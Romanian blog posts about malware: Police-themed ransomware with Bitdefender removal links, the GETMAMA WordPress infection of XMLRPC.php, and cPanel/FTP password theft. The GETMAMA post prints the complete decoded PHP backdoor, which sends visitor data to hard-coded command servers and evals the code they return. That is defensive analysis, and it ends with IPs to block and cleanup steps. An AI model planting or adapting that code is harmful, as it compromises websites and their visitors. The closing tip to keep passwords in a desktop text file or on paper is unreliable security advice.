Virusul “Politiei Romane”

Se stie foarte bine ca atat in Romania cat si in intreaga lume marile companii pierd sume mari de bani din cauza pirateriei. Exista milioane de utilizatori care descarca videoclipuri, fisiere sau software-uri de pe torente, neoriginale, in primul rand datorita faptului ca nu isi permit achizitionarea lor din magazinele specializate la preturi mari.

Ati primit un mesaj suspect din partea ‘Politiei Romane’ care va acuza ca utilizati soft-uri piratate sau ati descarcat fisiere ilegale de pe torente ?

Virusul Politiei Romane

Acest mesaj are rolul de intimidare a utilizatorilor, blocandu-le calculatorul si cerand o suma de bani pentru recuperarea datelor. Este un malware deosebit de periculos care a infectat, deja, milioane de calculatoare din intreaga lume, indiferent de utilizator sau de tara.

Dar, nu trebuie sa va speriati, noi va putem ajuta sa eliminati virusul care v-a atacat calculatorul.

Accesati link-ul de mai jos pentru a descarca un mic tool de la Bitdefender, acesta trebuie rulat in Safe Mode:

http://download.bitdefender.com/removal_tools/BDRemoval_Trojan_Ransom_IcePol.exe

Virusul despre care vorbim este de tip Ransom si este creat de hackerii rusi, cu denumirea Trojan.Ransom.IcePol. Problema blocarii computerului si alte detalii despre virus pot fi rezolvate prin instalarea software-ului:
http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=RemovalToolUnifiedLauncher.exe

Nu de putine ori, astfel de amenintari pentru datele de pe calculator ai utilizatorilor comuni si ale firmelor au blocat sau distrus documente de o importanta deosebita, mai ales daca vine vorba de fisiere secrete la nivel de corporatie sau chiar secrete de stat si care nu au mai putut fi recuperate. In cazul nostru, compania Bitdefender a creat o aplicatie gratuita impotriva virusului si probabil nu sunt singurii, dar majoritatea site-urilor din Romania ii recomanda pentru a rezolva definitiv problema cu virusul Politiei romane.


GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php

In lumea bloggerilor GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.phpa intrat un nou virus numit GETMAMA, nu va lasati indusi in eroare de numele acestuia, este unul dintre cele mai complexe virusuri deoarece este bine codat, ceea ce il face greu de depistat sau de inlaturat. Acesta afecteaza doar unele site-uri web afisand ferestre pop up. Luati aminte, acest virus afecteaza fisierul XMLRPC.php printre altele si doar utilizatorii de Windows. Codul este afisat doar o data pe zi pentru un ip si atunci nu afiseaza la toata lumea codul cu problema.

Noul virus este descris ca fiind unul “conditional” deoarece, in momentul infectarii acesta trimite informatia inapoi catre atacatori si are optiunea de a infecta un site, de a rula o comanda sau chiar de a nu face nimic. Informatii precum adresa de IP si date despre utilizatorul ce acceseaza site-ul ajung la dezvoltatorii acestui virus, iar acestia pot hotara daca sa afiseze continutul malitios sau nu. Daca acest continut malitios este afisat, acesta va va aparea doar o singura data pe zi, prin intermediul adresei de IP si doar utilizatorilor de Windows.

Acest virus a fost decodat si expus pe blogul celor de la sucuri.net. Forma decodata nu arata deloc cu forma virusului pe care o veti intalni, aceasta fiind codata pentru a o face mai greu de depistat.

if (!function_exists(“GetMama”)){

function mod_con($buf){str_ireplace(“”,””,$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace(“”,”” . stripslashes($_SERVER[“good”]),$buf); return $buf;}str_ireplace(“”,””,$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace(“”,stripslashes($_SERVER[“good”]).””,$buf); return $buf;}

return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array(“Content-Encoding: gzip”, $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam(“/tmp”, “FOO”);file_put_contents($tmpfname, $buf);$zd =
gzopen($tmpfname, “r”);$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header(“Content-Length: “.$len);return($contents);}

function GetMama(){$mother = “compromisedsite.com”;return $mother;}

ob_start(“opanki”);

function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER[“HTTP_HOST”])){$host = $_SERVER[“HTTP_HOST”];} else {$host = “”;}if (isset($_SERVER[“REMOTE_ADDR”])){$ip = $_SERVER[“REMOTE_ADDR”];} else {$ip = “”;}if (isset($_SERVER[“HTTP_REFERER”])){$ref = urlencode($_SERVER[“HTTP_REFERER”]);} else {$ref = “”;}if (isset($_SERVER[“HTTP_USER_AGENT”])){$ua = urlencode(strtolower($_SERVER[“HTTP_USER_AGENT”]));} else {$ua = “”;}if (isset($_SERVER[“QUERY_STRING”])){$qs = urlencode($_SERVER[“QUERY_STRING”]);} else {$qs = “”;}

$url_0 = “http://” . $pa;
$url_1 = “/jedi.php?version=0991&mother=” .$mama . “&file=” . $file . “&host=” . $host . “&ip=” . $ip . “&ref=” . $ref . “&ua=” .$ua . “&qs=” . $qs;
$try = true;

if( function_exists(“curl_init”) ){$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}

if ((ini_get(“allow_url_fopen”)) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}

if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = “GET $url_1 HTTP/1.0\r\n”;
$out .= “Host: $pa\r\n”;
$out .= “Connection: Close\r\n\r\n”;
fwrite($fp, $out);
$ret = “”;
while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, “\r\n\r\n”) + 4));}}

if (strpos($ult,”eval”) !== false)
{
$z = stripslashes(str_replace(“eval”,””,$ult)); eval($z); exit();
}
if (strpos($ult,”ebna”) !== false){$_SERVER[“good”] = str_replace(“ebna”,””,$ult);return true;}
else {return false;}}

$father2[] = “78.46.173.14”;
$father2[] = “176.9.218.191”;
$father2[] = “91.228.154.254”;
$father2[] = “77.81.241.253”;
$father2[] = “184.82.117.110”;
$father2[] = “46.4.202.93”;
$father2[] = “46.249.58.135”;
$father2[] = “176.9.241.150”;
$father2[] = “46.37.169.56”;
$father2[] = “46.30.41.99”;
$father2[] = “94.242.255.35”;
$father2[] = “178.162.129.223”;
$father2[] = “78.47.184.33”;
$father2[] = “31.184.234.96”;
shuffle($father2);
foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}

Cam atatea au fost spuse de acest virus, iar in continuare va oferim cateva solutii ce va va ajuta sa scapati de el.Pentru a-l inlatura este indicat verificarea traficului urmatoarelor adrese de IP si, ulterior, blocarea lor.

78.46.173.14
176.9.218.191
91.228.154.254
77.81.241.253
184.82.117.110
46.4.202.93
46.249.58.135
176.9.241.150
46.37.169.56
46.30.41.99
94.242.255.35
178.162.129.223
78.47.184.33
31.184.234.96

O alta alternativa este oferita pe site-ul edeir.ro si propune urmatoarea solutie, instalarea plugin-ului wordfence ce va efectua o scanare. Daca va depista ca fisierul XMLRPC.php a fost modificat sau oricare alt fisier de la wordpress inseamna ca ati fost infectat de acest virus. Stergeti fisierele respective, cautati ultima versiune de wordpress, in acesta veti gasi toate fisierele orginale care trebuie incarcate pe server. Exista un singur inconvenient, veti pierde orice personalizare facuta, dar veti elimina cu siguranta acest virus, desi exista sanse ca el sa revina daca aveti alte brese de securitate in difeirte teme sau pluginuri instalate.

Multa bafta in eliminarea virusului!


MALWARE – de ce apare si cum scapam de el

Dorim sa va prezentam, in cateva cuvinte, problema infectarii site-urilor cu MALWARE:

Este una din cele mai des intalnite probleme cu care se confrunta proprietarii de siteuri, fara experienta in domeniul web. Apare cel mai des din cauza unor brese de securitate in site, a unor vulnerabilitati in platformele folosite sau datorita salvarii parolelor de acces la cPanel/FTP in programe terte (browsere, programe FTP, etc).

Este foarte posibil ca dumneavoastra sau un alt coleg care are acces la aceste date, sa fi salvat parola de cPanel/FTP intr-un browser de internet (Mozzila Firefox, Chrome, Internet Explorer, etc) sau intr-un program de FTP (Filezilla, Total Commander, etc), iar de acolo, folosind un virus sau un keylogger, un hacker sau un robot sa le fure.
malware
PC-ul dumneavoastra (sau laptop, notebook, tableta, smartphone, etc) a fost infectat la un momentdat cu acel virus, care poate ramane latent (inactiv) chiar si ani de zile printre fisierele sistemului. Dupa care a devenit activ, a colectat parola cPanel/FTP de pe PC, s-a conectat la contul dumneavoastra si a infectat fisierele html, php de pe server, injectand un cod malware, un iFrame sau un cod java script.

Ce trebuie sa faceti in acest caz ? Sa schimbati de urgenta parola de cPanel/FTP sau sa cereti acest lucru printr-un mail la asistenta@clausweb.ro si sa nu o mai salvati niciodata in niciun program. Fie ca este vorba despre browser web, program FTP sau client de management e-mailuri, apasati pe NO de fiecare data cand vi se ofera optiunea de a memora parola. Dupa care, inlocuiti fisierele virusate din site cu cele curate si corecte, dintr-un backup. Adresati-va oricand cu incredere unui tehnician Claus Web pentru a va pune la dispozitie o arhiva full backup, printr-un mail la asistenta@clausweb.ro

ATENTIE! Cat timp salvati parolele in orice program, exista riscul sa va expuneti infectarii cu malware. Incercati in schimb, sa salvati parolele intr-un fisier text pe Desktop sau, si mai bine, sa le notati pe o foaie de hartie care o tineti mereu pe birou, in fata PC-ului.

Mai multe detalii la : http://ro.wikipedia.org/wiki/Malware